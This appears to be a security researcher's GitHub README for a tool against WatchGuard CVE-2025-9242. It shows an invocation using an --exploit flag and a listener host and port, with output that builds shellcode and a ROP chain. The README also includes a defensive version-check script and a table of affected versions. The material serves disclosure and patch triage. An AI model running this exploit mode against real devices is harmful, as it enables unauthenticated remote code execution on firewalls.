# watchTowr-vs-WatchGuard-CVE-2025-9242

Detection Artifact Generator for WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

See our [blog post](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/) for technical details

# Detection in Action

```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/

watchTowr-vs-WatchGuard-CVE-2025-9242.py

(*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

CVEs: [CVE-2025-9242]

[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```

# Description

This script attempts to detect if WatchGuard OS is vulnerable to CVE-2025-9242.
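The version-number comparison seen in the output above (`12.11.3 < 12.11.4`) can also be run offline over an asset inventory, using the resolved versions listed under Affected Versions. This is an added example, not code from the watchTowr script; the function names, the `t15_t35` and `fips` flags, the inventory rows, and the use of the build number to recognise 12.3.1_Update3 are assumptions made for illustration.

```python
import re

# Resolved versions copied from the Affected Versions table on this page.
FIXED_2025 = (2025, 1, 1)
FIXED_12X = (12, 11, 4)
FIXED_12_5 = (12, 5, 13)      # applies to T15 & T35 models only
FIPS_FIXED_BUILD = 722811     # 12.3.1_Update3 (B722811)


def parse_version(text):
    """Parse '12.11.3', '2025.1' or '12.3.1_Update3' into a 3-tuple of ints."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def classify(version, build=None, t15_t35=False, fips=False):
    """Return 'vulnerable', 'fixed', 'unknown' or 'not listed' for one device."""
    v = parse_version(version)
    if v[0] == 11:
        return "vulnerable"            # 11.x is end of life: no resolved version
    if v[0] == 2025:
        return "vulnerable" if v < FIXED_2025 else "fixed"
    if v[0] != 12:
        return "not listed"
    if fips and v == (12, 3, 1):
        # Assumption: build numbers only increase, so the build decides.
        if build is None:
            return "unknown"
        return "fixed" if build >= FIPS_FIXED_BUILD else "vulnerable"
    if t15_t35 and v[:2] == (12, 5):
        return "vulnerable" if v < FIXED_12_5 else "fixed"
    return "vulnerable" if v < FIXED_12X else "fixed"


if __name__ == "__main__":
    # Constructed inventory rows: (hostname, version, build, t15_t35, fips)
    inventory = [
        ("fw-branch-01", "12.11.3", 719894, False, False),
        ("fw-branch-02", "12.5.13", None, True, False),
        ("fw-lab-fips", "12.3.1", None, False, True),
        ("fw-legacy", "11.12.4", None, False, False),
    ]
    for host, ver, build, small, fips in inventory:
        print(f"{host:14} {ver:10} {classify(ver, build, small, fips)}")
```

A version-only result says nothing about whether the IKEv2 service is reachable or configured, so treat it as a patch-priority signal rather than proof of exposure.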
# Affected Versions

The following versions of WatchGuard OS are affected:

| Vulnerable Version              | Resolved Version         |
| ------------------------------- | ------------------------ |
| 2025.1                          | 2025.1.1                 |
| 12.x                            | 12.11.4                  |
| 12.5.x (T15 & T35 models)       | 12.5.13                  |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x                            | End of Life              |

For more information, visit [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015).

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team:

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber